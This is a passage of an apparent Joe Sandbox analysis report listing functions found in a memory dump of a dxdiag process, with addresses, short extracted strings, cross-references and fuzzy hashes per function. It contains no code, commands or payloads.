Instruction Fuzzy Hash: 9AA14471A043509FE724CF68CD41BAEBBB1FB85700F0541AEE905AF392D7759902CB95

Function 0040DEE9 Relevance: 3.9, Strings: 3, Instructions: 140COMMON

Download Yara Rule

Strings

su, xrefs: 0040DF15
VwWy, xrefs: 0040DF1C
)LWt, xrefs: 0040E10D

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: )LWt$VwWy$su
API String ID: 0-3217031312
Opcode ID: df3abb5220737b9bf04c5bae9f03c91a1aa6ed068ceafdad675784e96d291a5e
Instruction ID: 30f66bfa02c826f192fa745d1aa3d8111df13ee3ec6becbcaa5c5be03c67a3cc
Opcode Fuzzy Hash: df3abb5220737b9bf04c5bae9f03c91a1aa6ed068ceafdad675784e96d291a5e
Instruction Fuzzy Hash: 44510FB0201711ABD3248F21C495722BBB1BB19308F24969CD1861FB96D3BBE457CF88

Function 00414860 Relevance: 3.6, Strings: 2, Instructions: 1055COMMON

Download Yara Rule

Strings

4l, xrefs: 004149EB
KA, xrefs: 00414BDA

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: 4l$KA
API String ID: 0-2227922710
Opcode ID: ece183665e9cd0250bda4baa08dea94051610fd0a3949e522ee096408b33f542
Instruction ID: 7d394960c13b993b07ff0ec63b5c916a70d7b749b6eef6e0c3313fbac85af60e
Opcode Fuzzy Hash: ece183665e9cd0250bda4baa08dea94051610fd0a3949e522ee096408b33f542
Instruction Fuzzy Hash: 55421475608301CBE714DF24DC42ABB73A1FBC6314F19853EE58587391E7799885CB8A

Function 00404C50 Relevance: 3.3, Strings: 2, Instructions: 805COMMON

Download Yara Rule

Strings

0, xrefs: 0040559C
8, xrefs: 00405594

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 4d31846ea3cd1676bcc8b5810d49a0c429a9bcd0f11c617c85cd4880b3a76c6f
Instruction ID: 6370abf147319fefda308a2038e70a02aa4510a212c48b2156ced0c66922abe4
Opcode Fuzzy Hash: 4d31846ea3cd1676bcc8b5810d49a0c429a9bcd0f11c617c85cd4880b3a76c6f
Instruction Fuzzy Hash: A27224B16083419FD710CF18C880B9BBBE1AF94354F04892EF9999B392D379D958CF96

Function 00438D70 Relevance: 3.3, Strings: 2, Instructions: 755COMMON

Download Yara Rule

Strings

f, xrefs: 00439021
g, xrefs: 00439234

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeThunk
String ID: f$g
API String ID: 2994545307-2729975458
Opcode ID: 4cd79b717976fae15cbbecf2b362b45576482f5731d1ef7c12f67a79aa4caa16
Instruction ID: c9b2282577dd7928e87c6e7aed450861025ac80ca66e243a85fcddc34fbf70c2
Opcode Fuzzy Hash: 4cd79b717976fae15cbbecf2b362b45576482f5731d1ef7c12f67a79aa4caa16
Instruction Fuzzy Hash: 1F3204756083419FD714CF28C880A2FBBE2ABC9314F299A2EE5D597391CB75DC41CB4A

Function 00425820 Relevance: 3.1, Strings: 2, Instructions: 614COMMON

Download Yara Rule

Strings

dZB, xrefs: 00425A4D
r`B, xrefs: 00426065

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: dZB$r`B
API String ID: 0-3904460924
Opcode ID: 0a9eee2e05ad593b87d1a35673dacdee6d4f1f71470903015ce88b7b45ba2a2a
Instruction ID: cf11a58a00d61d500a6140a78dc3910c7a963cd34266b10506d1b50124c2a4e1
Opcode Fuzzy Hash: 0a9eee2e05ad593b87d1a35673dacdee6d4f1f71470903015ce88b7b45ba2a2a
Instruction Fuzzy Hash: D11245B460C3918BD710CF25E89126FBBE0EF96308F54896DE4C69B382D778D905CB5A

Function 00415FA1 Relevance: 3.1, Strings: 2, Instructions: 606COMMON

Download Yara Rule

Strings

, xrefs: 0041600D, 00416097
ofA, xrefs: 00416668

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: ofA$
API String ID: 0-1552613143
Opcode ID: e826f98870c836bfb8e0ea51c571821792422a0c5e161fdc289a0df1255da1a3
Instruction ID: 2c823ed54a2d2150a2d94358e89aa5dd56cf77a80caffb394fd748b267586704
Opcode Fuzzy Hash: e826f98870c836bfb8e0ea51c571821792422a0c5e161fdc289a0df1255da1a3
Instruction Fuzzy Hash: E51237756083509FD724CF28DC917AF77E2EB86314F154A3DE48A87291DB39D841CB8A

Function 004231F6 Relevance: 3.0, Strings: 2, Instructions: 524COMMON

Download Yara Rule

Strings

}~, xrefs: 004234C0
R9B, xrefs: 00423941

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: R9B$}~
API String ID: 0-2143352738
Opcode ID: a20bea4d2debd35d1aa5696fec164c130505b818f13da4c4dcc747a5536a5dc6
Instruction ID: c67b400d593570aea51a5883cfaab9404424982819ae66ceb36794941c5778d7
Opcode Fuzzy Hash: a20bea4d2debd35d1aa5696fec164c130505b818f13da4c4dcc747a5536a5dc6
Instruction Fuzzy Hash: BEF12276A18321DBC724DF24D8411ABB3F2FF85742F88896DE48597260E73C9B45CB49

Function 0041BE71 Relevance: 2.8, Strings: 2, Instructions: 349COMMON

Download Yara Rule

Strings

ij, xrefs: 0041BFD5
N%&', xrefs: 0041C2CD, 0041C2DA

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: N%&'$ij
API String ID: 0-2336341608
Opcode ID: 88f5ead50482a0d5692fe065ff7ab871ef9c8578c732ac1c41b12b274cf9b7f8
Instruction ID: 3ec1164c08b8df8f5ad239da4b50aaa16cb908530bffe58995966572d7d06e5a
Opcode Fuzzy Hash: 88f5ead50482a0d5692fe065ff7ab871ef9c8578c732ac1c41b12b274cf9b7f8
Instruction Fuzzy Hash: 63913375A483008BC714CF69CC913ABB7E2EFD9314F08C96DE8C68B385E7789585875A

Function 00404300 Relevance: 2.8, Strings: 2, Instructions: 335COMMON

Download Yara Rule

Strings

), xrefs: 00404379
IEND, xrefs: 004046FD

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: 18bf37ad41109e80a1a09e8aa62cffcf334b86b9c7745820e439ec832c58c8b6
Instruction ID: 69784f994d522c806696069fb0bc0fba4b22834945d23ce78d0c5b6699577816
Opcode Fuzzy Hash: 18bf37ad41109e80a1a09e8aa62cffcf334b86b9c7745820e439ec832c58c8b6
Instruction Fuzzy Hash: F2D191B19083449FD710CF15D841B5FBBE4AB94308F14492EFA99AB3C2D779E908CB96

Function 0040C72B Relevance: 2.8, Strings: 2, Instructions: 256COMMON

Download Yara Rule

Strings

h3T5, xrefs: 0040C8BC
./, xrefs: 0040C8F4

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: ./$h3T5
API String ID: 0-2425256910
Opcode ID: a2b2180c65d7394546b7c1e0cf6cc2ed789f617f73c682bd2d84fc2d095af9de
Instruction ID: 8875d4901756c4b216268357a0ac996a12432350b8b0083aa304c3f513ba26e0
Opcode Fuzzy Hash: a2b2180c65d7394546b7c1e0cf6cc2ed789f617f73c682bd2d84fc2d095af9de
Instruction Fuzzy Hash: EA7114B651C3409AC718DF24CC9117BB7B2EFD5304F19962DE89567391EB38860AC78D

Function 0040FB71 Relevance: 2.3, Strings: 1, Instructions: 1089COMMON

Download Yara Rule

Strings

+, xrefs: 004106BC

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeThunk
String ID: +
API String ID: 2994545307-2126386893
Opcode ID: e49cc565bb25ea712ded7a77cb7fabab62f070ab26babbd63597e6b6ddc6b1e9
Instruction ID: 1a842e94016ed2d8c532f852bc49d7d4a1e2a2dd1db2aad469a581af37c970af
Opcode Fuzzy Hash: e49cc565bb25ea712ded7a77cb7fabab62f070ab26babbd63597e6b6ddc6b1e9
Instruction Fuzzy Hash: C9924EB1604B408FD324DF38C5953ABBBE2AB95314F18893ED4EB873C2DA78A545C746

Function 004216E0 Relevance: 1.7, Strings: 1, Instructions: 457COMMON

Download Yara Rule

Strings

o]^, xrefs: 0042191D

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: o]^
API String ID: 0-3943879297
Opcode ID: e60bd4a8b9da6522f1b3359eba3995bbb3ba7a4471dfa0ff8ca762107fd0de44
Instruction ID: 4669969d7b71f7d68a9b592d0a4a540a5b8527d65a8744ebe538e10e24e07286
Opcode Fuzzy Hash: e60bd4a8b9da6522f1b3359eba3995bbb3ba7a4471dfa0ff8ca762107fd0de44
Instruction Fuzzy Hash: 58B16C72B083205BD714DB24E89277BB3A1EFE1354F59842EE88557391E63CE805C39A

Function 0041C330 Relevance: 1.7, Strings: 1, Instructions: 443COMMON

Download Yara Rule

Strings

q, xrefs: 0041C3FA

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: q
API String ID: 0-1973602202
Opcode ID: 3144f0c7d77c94f0b15253ad0cdaa548fa628ab49627c29bc90b5f25244d2502
Instruction ID: b69d45c65629a181d3394273b162446badd9582a993c74671e4135a58d3492d1
Opcode Fuzzy Hash: 3144f0c7d77c94f0b15253ad0cdaa548fa628ab49627c29bc90b5f25244d2502
Instruction Fuzzy Hash: 8BC10075A583108BC7248F28CC913ABB3F1EF96314F48992DE8C59B394E778D944C78A

Function 00427C0F Relevance: 1.6, Strings: 1, Instructions: 324COMMON

Download Yara Rule

Strings

{B, xrefs: 00427BE2, 00427FE0

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: {B
API String ID: 0-2955416605
Opcode ID: b0bd08c29f9365885b933f1cf599b0cb6fa5fdb634cbb513a89aaee83ecc68c5
Instruction ID: 125d85a474e2c54c7edf7e8372bc309e0328607fb292080dea6794c80479f12b
Opcode Fuzzy Hash: b0bd08c29f9365885b933f1cf599b0cb6fa5fdb634cbb513a89aaee83ecc68c5
Instruction Fuzzy Hash: C3A145B5A0C3508FD7108F28D89222BBBE1AF86304F54883EF5D58B352E638D905CB97

Function 00405E40 Relevance: 1.5, Strings: 1, Instructions: 269COMMON

Download Yara Rule

Strings

,, xrefs: 00405F76

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: f4f7a47380c80d9f1d47d0d0c507c35257674a6dd286f39611ef468fd00499a1
Instruction ID: 51a14242803ecae43574cd839083da134051b3b3a324024ad900f53de0fcc2f5
Opcode Fuzzy Hash: f4f7a47380c80d9f1d47d0d0c507c35257674a6dd286f39611ef468fd00499a1
Instruction Fuzzy Hash: C5B149712097819FD325CF18C88061BFBE0AFA9704F544E2DE5D997382D635EA18CBA7

Function 00409070 Relevance: 1.5, Strings: 1, Instructions: 256COMMON

Download Yara Rule

Strings

JR, xrefs: 00409089

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: JR
API String ID: 0-3458893224
Opcode ID: f7ae3770ed4749ad032964f2c81e60ade692c3c1a8750135e5cb492e043d9f21
Instruction ID: 44b59cc75133df7a41eb2e69763ada4243d618a4e2d430adff5262eca57ed642
Opcode Fuzzy Hash: f7ae3770ed4749ad032964f2c81e60ade692c3c1a8750135e5cb492e043d9f21
Instruction Fuzzy Hash: 0E61C52128C3C19AC3118F7994A07A7FFE09FA3314F1849BDE8D45B382D379891AD766

Function 0041CE00 Relevance: 1.5, Strings: 1, Instructions: 256COMMON

Download Yara Rule

Strings

~, xrefs: 0041CEC4

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: da1ad588922710a023164653a75339d34dbf593a205ea83d969eb3b9ccb4115d
Instruction ID: 6fa54e92a4b9978c13d68c63913922f98e05887ce952ffb0b0acc6151ef16d97
Opcode Fuzzy Hash: da1ad588922710a023164653a75339d34dbf593a205ea83d969eb3b9ccb4115d
Instruction Fuzzy Hash: 04811972A442614FC721CE28CC9139BBB919B85324F19827EECB99B3D2D638DC46D7D1

Function 00417D74 Relevance: 1.5, Strings: 1, Instructions: 215COMMON

Download Yara Rule

Strings

gfff, xrefs: 00417F4E

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: gfff
API String ID: 0-1553575800
Opcode ID: e937fccc05efa2ecf9c05215e5990dbb3af36eaf18178220cc255147cd05165b
Instruction ID: b635ffe6758fa563810d355454ed740eab1994e1762da840ca45afbcef432b43
Opcode Fuzzy Hash: e937fccc05efa2ecf9c05215e5990dbb3af36eaf18178220cc255147cd05165b
Instruction Fuzzy Hash: AF61D2B16083058BD354CF18C8417ABBBE6FBC9314F15892EE489D7392DB78D945CB8A

Function 0043A71E Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

W, xrefs: 0043A793

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: W
API String ID: 0-793274765
Opcode ID: 949d4f68b5a0f5e009217c52b19c5dd71c50b240281d9f5b5bf409637eb5aa83
Instruction ID: 1e5f2fd2993d5a5d00e1584304d987d2456e5e273d97887f4c8a7713582cd764
Opcode Fuzzy Hash: 949d4f68b5a0f5e009217c52b19c5dd71c50b240281d9f5b5bf409637eb5aa83
Instruction Fuzzy Hash: FE01D877B024018BC71CCF38C8A3565B7A3EB96215769627EC562DF3D9DE3498018648

Function 0040F116 Relevance: .7, Instructions: 745COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5e5b76ba52c3424cd9b7fcdc2f1a91986ccf407eca0dfc2878058712d65e054
Instruction ID: f3d5467b55631bdaa724751aa9045b56e4334b6402e67d183f6a87da8050b689
Opcode Fuzzy Hash: b5e5b76ba52c3424cd9b7fcdc2f1a91986ccf407eca0dfc2878058712d65e054
Instruction Fuzzy Hash: D152C471608B408FD364DF38C5953A7BBE1AB55314F18893ED8EB837C2E639A509C746

Function 00406670 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d126f66a0e66620eabdd7cd9048ccabb2a362495bcb1caefcf2ffaaa0a9a3f4a
Instruction ID: cba84eeb8f78e0ae709cb9e2e748fe6274e4b764df0cc893636221a17d4e6bb5
Opcode Fuzzy Hash: d126f66a0e66620eabdd7cd9048ccabb2a362495bcb1caefcf2ffaaa0a9a3f4a
Instruction Fuzzy Hash: 2452F1B0A08B849FE730DF24C4847A7BBE1AB51314F15883ED5E7167C2C37DA9958B1A

Function 0041EC80 Relevance: .7, Instructions: 658COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc4c0233347152bea9374f1e245860b134debedbd6707f992945391f7166038a
Instruction ID: 86af1cb4bafd0ed74008c60c32463ec180b14810afe3fc4f9a0b4589affe1339
Opcode Fuzzy Hash: cc4c0233347152bea9374f1e245860b134debedbd6707f992945391f7166038a
Instruction Fuzzy Hash: 476219B0508B819ED371CF3D8805786BFE5AB5A320F148A5EE4FAC7392D774A501CB66

Function 00402F50 Relevance: .7, Instructions: 657COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05d9facb0d4c79a7579644c66930578ddf1e6edfe5b96f5a7fc26d4a417109ca
Instruction ID: 1c54c97c46aa2ef6bdbd5d76da75d5e4d1013e71daecfc50a96a56d554505fa0
Opcode Fuzzy Hash: 05d9facb0d4c79a7579644c66930578ddf1e6edfe5b96f5a7fc26d4a417109ca
Instruction Fuzzy Hash: 6552F4715083459FCB14CF18C0806AABFE1BF89305F188A7EF8996B391D778E945CB89

Function 00407450 Relevance: .6, Instructions: 625COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e146d9e79c543f870ee6916604a8e8036e439f7ac644d997363382936f2289b5
Instruction ID: e3b42c420a0ab721274a946c9fa7eab4dab2f787d0bed5ea88cf2f50095341df
Opcode Fuzzy Hash: e146d9e79c543f870ee6916604a8e8036e439f7ac644d997363382936f2289b5
Instruction Fuzzy Hash: 5F22B332A087118BC725DE18D9806ABB3E1BFC4319F19893ED9C6A7385D738B8518B47

Function 00403950 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71b1cecae46f736fb81e8164bc74a66928acdad7a3bbb41b8c7e87c625e2b1db
Instruction ID: cb804480fa9771f3decfe968603f1fa251b047b45c1119fa1a0aece904f71b93
Opcode Fuzzy Hash: 71b1cecae46f736fb81e8164bc74a66928acdad7a3bbb41b8c7e87c625e2b1db
Instruction Fuzzy Hash: C8322470914B118FC328CF29C68052ABBF5BF85711B604A2ED697A7F90D73AF945CB18

Function 00411712 Relevance: .5, Instructions: 546COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f567d6d837b9d1cd09dbb14271fc336aa9119b96957633eaba47b69cb481c3c3
Instruction ID: 8de7fec0fbf75a066610e9e7739594f8429d2466b2c872ee27e4363637c8b379
Opcode Fuzzy Hash: f567d6d837b9d1cd09dbb14271fc336aa9119b96957633eaba47b69cb481c3c3
Instruction Fuzzy Hash: 9A22D3B5A08B408FD324DF38D4953ABBBE1AF55304F04893ED5EB87392E638A545CB46

Function 0043BA70 Relevance: .5, Instructions: 504COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75d62604bc8ba10a3965eda64e96c0529ca78dc7befd1f69851b412b056e6d36
Instruction ID: f274cfa4fd23e6236676cd1f27d37eda4d2c4e9f7f04722437533fa671a78e6f
Opcode Fuzzy Hash: 75d62604bc8ba10a3965eda64e96c0529ca78dc7befd1f69851b412b056e6d36
Instruction Fuzzy Hash: 03E11136718215CFCB08CF38D89126BB7E2EB8A314F1A857ED846D7391DB38D8058B85

Function 004362F0 Relevance: .5, Instructions: 482COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 25fc821ec4db295837e7241b6350ca118c1fd0113733dc9c373dc5578713d375
Instruction ID: 66bc5b333a0c6ee299b6e4738c483b6afcae0af6661c562ee48f541c7812e622
Opcode Fuzzy Hash: 25fc821ec4db295837e7241b6350ca118c1fd0113733dc9c373dc5578713d375
Instruction Fuzzy Hash: 71D14631608311ABD314DF24C88166FF7E1EB99718F15E92EE98593391D778DC05CB8A

Function 004082F0 Relevance: .4, Instructions: 429COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c961975c57f87857eab043c76c47428008017fdca8ad897df3e3d02d69e77613
Instruction ID: 193ede2baf899d4cd5aa5ba4271a00cee3d3de787d1d5f2eafa8c2ae60b57e67
Opcode Fuzzy Hash: c961975c57f87857eab043c76c47428008017fdca8ad897df3e3d02d69e77613
Instruction Fuzzy Hash: ADF12931A083525BC714CE29C99016BB7E3AFC5324F198A2EE4E5673D5DB38ED068B85

Function 00405980 Relevance: .4, Instructions: 400COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f22763de4bcdc26485400349c62461b958b278f38fe56ac1e4a402e23215dde
Instruction ID: 5cf728b11992c65e55bd4be9dc5e9eb5593f12857077bfd5cee5c93eadafeb55
Opcode Fuzzy Hash: 0f22763de4bcdc26485400349c62461b958b278f38fe56ac1e4a402e23215dde
Instruction Fuzzy Hash: 78E179711087418FD720DF29C880B6BBBE1EF99304F44882EE4D597791E779E948CB96

Function 0043D040 Relevance: .4, Instructions: 364COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5f5a32466b316229b481c2a5b140de938fb66be6b533df1eade2e4f47dd166c5
Instruction ID: 49bb995cc6258f3b287554f64d1e249e4e01c3de4c67095bf9184da5ae40cd93
Opcode Fuzzy Hash: 5f5a32466b316229b481c2a5b140de938fb66be6b533df1eade2e4f47dd166c5
Instruction Fuzzy Hash: 1BA13335A083118BC714DF29E88062BB7F2EF89310F09D56EE9918B395D779EC51CB86

Function 0041D0C0 Relevance: .3, Instructions: 314COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afb16abf37928c5a7a5a34e99eaa9267622f6c5fd6ab5e95d3228bbac6b96ad5
Instruction ID: 7ac7e3b168bbb7afd94fe29f1e54d1f5c433d12e6b19e411e96f11bbc3239d1b
Opcode Fuzzy Hash: afb16abf37928c5a7a5a34e99eaa9267622f6c5fd6ab5e95d3228bbac6b96ad5
Instruction Fuzzy Hash: 88B104B5908201AFD7209F64CC42B5ABBE1FBD5314F144A3EFC98A32A0D735D855DB8A

Function 0043CCF0 Relevance: .3, Instructions: 307COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1484557844803522bcb117125b195ac7485a0970c045e37efc9e321e46d71030
Instruction ID: ba8a09dc2418c02870105bc3f6dd75cfc533c2f59140fb6bc1d6151d28bd9c6f
Opcode Fuzzy Hash: 1484557844803522bcb117125b195ac7485a0970c045e37efc9e321e46d71030
Instruction Fuzzy Hash: CB910475A043019BD3189F29C89166BB7F2FFC9720F19A52EE895A7390D738EC41CB85

Function 004061E0 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 192b9d08ce17bc1d312091997c30b37e60dce660e4c0c653e6da0c20b7bf1f23
Instruction ID: 86fd598b9c61968874822396d4ab8b809d08d2c2737f86e898986d6ce750098e
Opcode Fuzzy Hash: 192b9d08ce17bc1d312091997c30b37e60dce660e4c0c653e6da0c20b7bf1f23
Instruction Fuzzy Hash: 7FC15BB29087418FC360CF28DC86BABB7E1BF85318F09492DD5DAD6242E778A155CB46

Function 00434463 Relevance: .3, Instructions: 293COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63f2497d7e62285dada7a2876494175f4b0e6dd28d60008838a8d86744dd0c73
Instruction ID: 6dc5e2ab74ae951aaa46e5139dd55047cfb70fd72833bef498b558f7cf56f5ea
Opcode Fuzzy Hash: 63f2497d7e62285dada7a2876494175f4b0e6dd28d60008838a8d86744dd0c73
Instruction Fuzzy Hash: 81D19A205087D18ED326CB3C8848B897FE15B6B324F0A83D9D4E65F3E3C3699946C766

Function 0041D4C0 Relevance: .3, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
